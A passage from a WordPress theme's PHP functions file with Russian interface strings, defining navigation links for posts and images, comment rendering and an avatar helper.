				wp_pagenavi();
				theme_post_wrapper(array('content' => ob_get_clean()));
				return;
			} 
			//posts
			$prev_link = get_previous_posts_link(__('Следующие записи <span class="meta-nav">&rarr;</span>', THEME_NS));
			$next_link = get_next_posts_link(__('<span class="meta-nav">&larr;</span> Предыдущие записи', THEME_NS));
		}
		$content = '';
		if ($prev_link || $next_link) {

			$content = <<<EOL
	<div class="navigation">
		<div class="alignleft">{$next_link}</div>
		<div class="alignright">{$prev_link}</div>
	 </div>
EOL;
		}
		if ($wrap) {
			theme_post_wrapper(array('content' => $content));	
		} else {
			echo $content;
		}
	}
}

if (!function_exists('theme_get_previous_post_link')){

	function theme_get_previous_post_link($format='&laquo; %link', $link='%title', $in_same_cat = false, $excluded_categories = '') {
		return theme_get_adjacent_post_link($format, $link, $in_same_cat, $excluded_categories, true);
	}
}

if (!function_exists('theme_get_next_post_link')){
	function theme_get_next_post_link($format='%link &raquo;', $link='%title', $in_same_cat = false, $excluded_categories = '') {
		return theme_get_adjacent_post_link($format, $link, $in_same_cat, $excluded_categories, false);
	}
}

if (!function_exists('theme_get_adjacent_image_link')){
	function theme_get_adjacent_image_link($prev = true, $size = 'thumbnail', $text = false) {
		global $post;
		$post = get_post($post);
		$attachments = array_values(get_children( array('post_parent' => $post->post_parent, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID') ));

		foreach ( $attachments as $k => $attachment )
			if ( $attachment->ID == $post->ID )
				break;

		$k = $prev ? $k - 1 : $k + 1;

		if ( isset($attachments[$k]) )
			return wp_get_attachment_link($attachments[$k]->ID, $size, true, false, $text);
	}
}

if (!function_exists('theme_get_previous_image_link')){
	function theme_get_previous_image_link($size = 'thumbnail', $text = false) {
		$result = theme_get_adjacent_image_link(true, $size, $text);
		if ($result) $result = '&laquo; ' . $result;
		return $result;
	}
}
	
if (!function_exists('theme_get_next_image_link')){
	function theme_get_next_image_link($size = 'thumbnail', $text = false) {
		$result = theme_get_adjacent_image_link(false, $size, $text);
		if ($result) $result .= ' &raquo;';
		return $result;
	}
}

if (!function_exists('theme_get_adjacent_post_link')){
	function theme_get_adjacent_post_link($format, $link, $in_same_cat = false, $excluded_categories = '', $previous = true) {
		if ( $previous && is_attachment() )
			$post = & get_post($GLOBALS['post']->post_parent);
		else
			$post = get_adjacent_post($in_same_cat, $excluded_categories, $previous);

		if ( !$post )
			return;

		$title = $post->post_title;

		if ( empty($post->post_title) )
			$title = $previous ? __('Предыдущие записи', THEME_NS) : __('Следующие записи', THEME_NS);

		$title = apply_filters('the_title', $title, $post->ID);
		$short_title = $title;
		if (theme_get_option('theme_single_navigation_trim_title')) {
			$short_title = theme_trim_long_str($title, theme_get_option('theme_single_navigation_trim_len'));
		}
		$date = mysql2date(get_option('date_format'), $post->post_date);
		$rel = $previous ? 'prev' : 'next';

		$string = '<a href="'.get_permalink($post).'" title="'.esc_attr($title).'" rel="'.$rel.'">';
		$link = str_replace('%title', $short_title, $link);
		$link = str_replace('%date', $date, $link);
		$link = $string . $link . '</a>';

		$format = str_replace('%link', $link, $format);

		$adjacent = $previous ? 'previous' : 'next';
		return apply_filters( "{$adjacent}_post_link", $format, $link );
	}
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('theme_comment')){
	function theme_comment( $comment, $args, $depth ) {
		$GLOBALS['comment'] = $comment;
		
		
		switch ( $comment->comment_type ) :
		
			case '' :
		?>
		<li <?php comment_class(); ?> id="li-comment-<?php comment_ID(); ?>">
			<?php ob_start(); ?>
			<div class="comment-author vcard">
				<?php echo theme_get_avatar(array('id' => $comment, 'size' => 48)); ?>
				<?php printf( __( '%s <span class="says">сказал:</span>', THEME_NS ), sprintf( '<cite class="fn">%s</cite>', get_comment_author_link() ) ); ?>
			</div>
			<?php if ( $comment->comment_approved == '0' ) : ?>
				<em><?php _e( 'Ваш комментарий ожидает модерации.', THEME_NS); ?></em>
				<br />
			<?php endif; ?>

			<div class="comment-meta commentmetadata"><a href="<?php echo esc_url( get_comment_link( $comment->comment_ID ) ); ?>">
				<?php
					printf( __( '%1$s - %2$s', THEME_NS ), get_comment_date(),  get_comment_time() ); ?></a><?php edit_comment_link( __( '(Редактировать)', THEME_NS), ' ' );
				?>
			</div>

			<div class="comment-body"><?php comment_text(); ?></div>

			<div class="reply">
				<?php comment_reply_link( array_merge( $args, array( 'depth' => $depth, 'max_depth' => $args['max_depth'] ) ) ); ?>
			</div>
			<?php theme_post_wrapper(array('content' => ob_get_clean(), 'id' => 'comment-'.get_comment_ID())); ?>


		<?php
				break;
			case 'pingback'  :
			case 'trackback' :
		?>
		<li class="post pingback">
		<?php ob_start(); ?>
			<p><?php _e( 'Ссылки:', THEME_NS ); ?> <?php comment_author_link(); ?><?php edit_comment_link( __('(Редактировать)', THEME_NS), ' ' ); ?></p>
		<?php theme_post_wrapper(array('content' => ob_get_clean(), 'class' => $comment->comment_type));
				break;
		endswitch;
	}
}

if (!function_exists('theme_get_avatar')){
	function theme_get_avatar($args = ''){
	$args = wp_parse_args($args, array('id' => false, 'size' => 96, 'default' => '', 'alt' => false, 'url' => false));
	extract($args);
		$result = get_avatar($id, $size, $default, $alt);
		if ($result) {
			if ($url){
				$result = '<a href="'.esc_url($url).'">' . $result . '</a>';
			}
			$result = '<div class="avatar">' . $result . '</div>';
		}
		return $result;
	}
}

if (!function_exists('get_post_format')){
	function get_post_format(){
		return false;
	}
}